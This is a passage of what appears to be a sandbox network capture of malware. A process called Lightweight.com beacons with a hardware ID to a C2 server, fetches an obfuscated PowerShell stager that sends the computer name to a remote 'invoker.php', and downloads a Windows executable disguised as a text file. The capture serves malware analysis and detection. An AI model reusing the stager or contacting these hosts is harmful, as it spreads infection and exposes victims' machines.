cfL4;desc="?proto=TCP&rtt=2100&min_rtt=2037&rtt_var=809&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21394&delivery_rate=1433480&cwnd=252&unsent_bytes=0&cid=84ffcefabd7ddf89&ts=980&x=0"
2024-12-26 17:26:26 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 17:26:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.16	49713	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:27 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1ALGZ4CTARQPM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 637 Host: laborersquei.click
2024-12-26 17:26:27 UTC	637	OUT	Data Raw: 2d 2d 31 41 4c 47 5a 34 43 54 41 52 51 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 31 41 4c 47 5a 34 43 54 41 52 51 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 41 4c 47 5a 34 43 54 41 52 51 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 31 41 4c 47 5a 34 43 54 41 52 Data Ascii: --1ALGZ4CTARQPMContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--1ALGZ4CTARQPMContent-Disposition: form-data; name="pid"1--1ALGZ4CTARQPMContent-Disposition: form-data; name="lid"jMw1IE--psyche--1ALGZ4CTAR
2024-12-26 17:26:28 UTC	1128	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d8h3gqu9u7r9ugqbqi15qc4110; expires=Mon, 21 Apr 2025 11:13:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zNXs65SwDt7Nz9hEW%2FSXNTlXHqziaXeqjvOcwXGqCxZln4yKg3tsIbXbkrw1b%2F3dW9xSxMU2Z9hXnlAL%2FyUQVVfock8YMHEnkUi39HTEjDlDc1MnqroR28P8oxABIGFCfteexKM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c6a75a60c42a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1461&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1550&delivery_rate=1888745&cwnd=200&unsent_bytes=0&cid=51d7199a8433bb63&ts=774&x=0"
2024-12-26 17:26:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 17:26:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.16	49714	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:29 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1RG2I12A0GZ9UYB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1565 Host: laborersquei.click
2024-12-26 17:26:29 UTC	1565	OUT	Data Raw: 2d 2d 31 52 47 32 49 31 32 41 30 47 5a 39 55 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 31 52 47 32 49 31 32 41 30 47 5a 39 55 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 52 47 32 49 31 32 41 30 47 5a 39 55 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 31 52 47 32 Data Ascii: --1RG2I12A0GZ9UYBContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--1RG2I12A0GZ9UYBContent-Disposition: form-data; name="pid"1--1RG2I12A0GZ9UYBContent-Disposition: form-data; name="lid"jMw1IE--psyche--1RG2
2024-12-26 17:26:30 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8fb89lotufif54ktg2gvs67r95; expires=Mon, 21 Apr 2025 11:13:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYxoeHFpeBEgIWfo3t37g4qLXIKysDpFvfM1IIoWa5GV8loOaNYLVQf%2B83Ix0eDW9IgDGI2cduuvk8NmdU3NqWmmefeaB5Wwn5mL6jvqAoqX8f4g53YrvmW36IgNq3mLdJNv13M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c6b63be942b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1877&min_rtt=1870&rtt_var=716&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2481&delivery_rate=1512169&cwnd=218&unsent_bytes=0&cid=cecdb4b5380656dc&ts=1177&x=0"
2024-12-26 17:26:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 17:26:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.16	49715	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:32 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0HJAY2QJQ8E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1140 Host: laborersquei.click
2024-12-26 17:26:32 UTC	1140	OUT	Data Raw: 2d 2d 30 48 4a 41 59 32 51 4a 51 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 30 48 4a 41 59 32 51 4a 51 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 48 4a 41 59 32 51 4a 51 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 30 48 4a 41 59 32 51 4a 51 38 45 0d 0a 43 6f 6e Data Ascii: --0HJAY2QJQ8EContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--0HJAY2QJQ8EContent-Disposition: form-data; name="pid"1--0HJAY2QJQ8EContent-Disposition: form-data; name="lid"jMw1IE--psyche--0HJAY2QJQ8ECon
2024-12-26 17:26:32 UTC	1132	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=179f57o6acojq9dn9396j3b32f; expires=Mon, 21 Apr 2025 11:13:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GpKs5HdfW2fRtP1I%2BORuLA0WEzDh4zIYVvCzBgxdquRnY9AxkJjXlRkNpzCxl%2B8rLy5BZ%2BCmdHerJWCAeq40WJuFIFJeAY55KTZZ55lfKL%2Ftq8zeY4zcKDY%2BgMLYq7JCVuWtE60%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c6c3cda64380-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1583&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2052&delivery_rate=1811414&cwnd=223&unsent_bytes=0&cid=8fab94b0a246973c&ts=815&x=0"
2024-12-26 17:26:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 17:26:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.16	49716	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:34 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KACTUHKC32X8JDQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1103 Host: laborersquei.click
2024-12-26 17:26:34 UTC	1103	OUT	Data Raw: 2d 2d 4b 41 43 54 55 48 4b 43 33 32 58 38 4a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 4b 41 43 54 55 48 4b 43 33 32 58 38 4a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 41 43 54 55 48 4b 43 33 32 58 38 4a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 4b 41 43 54 Data Ascii: --KACTUHKC32X8JDQContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--KACTUHKC32X8JDQContent-Disposition: form-data; name="pid"1--KACTUHKC32X8JDQContent-Disposition: form-data; name="lid"jMw1IE--psyche--KACT
2024-12-26 17:26:35 UTC	1136	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0u8ce7bdj75gdboi8khg3aa4kj; expires=Mon, 21 Apr 2025 11:13:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3RVc%2BH3YdP6ZD8KEDqpxTBJC3H3Nrk6Gi6eDKhF8HQq%2BIl2nUNOfVwNTlX%2Fj7Q%2BaeuGP6hFNRgEmbMNydp9J4PTPmc%2FjMX%2BlOC5ucnCWVBmH89ALOUOSAdWxmJDvSH%2B3bTh5xs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c6d1bc220f8b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1504&rtt_var=575&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2019&delivery_rate=1885087&cwnd=237&unsent_bytes=0&cid=673398a7960390b6&ts=820&x=0"
2024-12-26 17:26:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 17:26:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.16	49717	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:36 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: laborersquei.click
2024-12-26 17:26:36 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=F175BC40C87D05B7D0F23BE3BFA4D7B0
2024-12-26 17:26:37 UTC	1128	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vm5vtqk27rju8aegkfoe0ms8ph; expires=Mon, 21 Apr 2025 11:13:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OJY2dWJqsmHGSwUBiRtt2yCu8%2BGK21Smohv1vRNz12wBv4hGai0pohLab876UJL38O1kkwKMJeJG2wid2LDfQLe9uSdx37pZnLnjt2bN%2BlkSO2HmWJAwHb29EO0gzKE2i%2FYdadM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c6df8cec4219-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1737&rtt_var=661&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1018&delivery_rate=1644144&cwnd=193&unsent_bytes=0&cid=acf124e5370c17ba&ts=774&x=0"
2024-12-26 17:26:37 UTC	218	IN	Data Raw: 64 34 0d 0a 6d 44 55 79 66 50 61 7a 6f 6d 51 69 62 52 55 34 39 50 79 6b 4e 4b 32 2f 70 69 44 71 79 51 4d 4d 62 62 45 6e 55 54 77 79 2b 64 62 44 54 68 41 4a 31 49 6d 41 44 46 59 5a 5a 55 76 4f 6f 49 74 6f 67 74 7a 44 52 35 2f 6e 63 47 51 43 77 58 74 2b 42 41 66 4f 34 71 6f 44 41 45 6a 43 68 66 35 4c 55 67 55 37 54 49 79 49 68 68 69 50 32 64 49 43 30 50 73 76 4c 67 69 54 48 57 42 42 48 6f 4c 30 37 52 63 49 58 70 37 48 31 68 52 52 56 30 6b 58 71 4e 50 50 57 4d 54 50 31 56 6d 51 70 6d 52 70 46 4a 39 55 4f 56 4e 43 70 66 6e 78 57 30 59 6a 6c 64 2f 53 4f 31 45 46 64 42 61 41 68 4e 41 57 67 5a 33 41 56 4d 6a 7a 4d 53 42 50 31 41 56 72 44 55 2b 6b 0d 0a Data Ascii: d4mDUyfPazomQibRU49PykNK2/piDqyQMMbbEnUTwy+dbDThAJ1ImADFYZZUvOoItogtzDR5/ncGQCwXt+BAfO4qoDAEjChf5LUgU7TIyIhhiP2dIC0PsvLgiTHWBBHoL07RcIXp7H1hRRV0kXqNPPWMTP1VmQpmRpFJ9UOVNCpfnxW0Yjld/SO1EFdBaAhNAWgZ3AVMjzMSBP1AVrDU+k
2024-12-26 17:26:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.16	49718	185.161.251.21	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:39 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2024-12-26 17:26:39 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Thu, 26 Dec 2024 17:26:39 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2024-12-26 17:26:39 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.16	49719	172.67.214.186	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:41 UTC	206	OUT	GET /int_clp_sha.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: klipsyzogey.shop
2024-12-26 17:26:42 UTC	905	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:42 GMT Content-Type: text/plain Content-Length: 8371434 Connection: close Accept-Ranges: bytes ETag: "2a2989ed741c431f4a3276264f7bdb61" Last-Modified: Wed, 25 Dec 2024 17:25:54 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8F%2F6aG8ARjFg7XQd4Z2rSztBA1EdDadxpJM2QYavjzK5pTeKzgMVDhx0tmJ0UEJXCmCWuBeiOjMGZTkyzdtIQ%2F%2FjSw8HFwjzA8SR8FrOZv%2BoSguCDTkufJRd73Ofeojkh8L%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c6ffadcac346-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1606&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2869&recv_bytes=820&delivery_rate=1771844&cwnd=181&unsent_bytes=0&cid=d58ff94b1a028ae4&ts=631&x=0"
2024-12-26 17:26:42 UTC	464	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 13 40 00 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 Data Ascii: @HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 40 00 4a 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 Data Ascii: @Jr@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(J
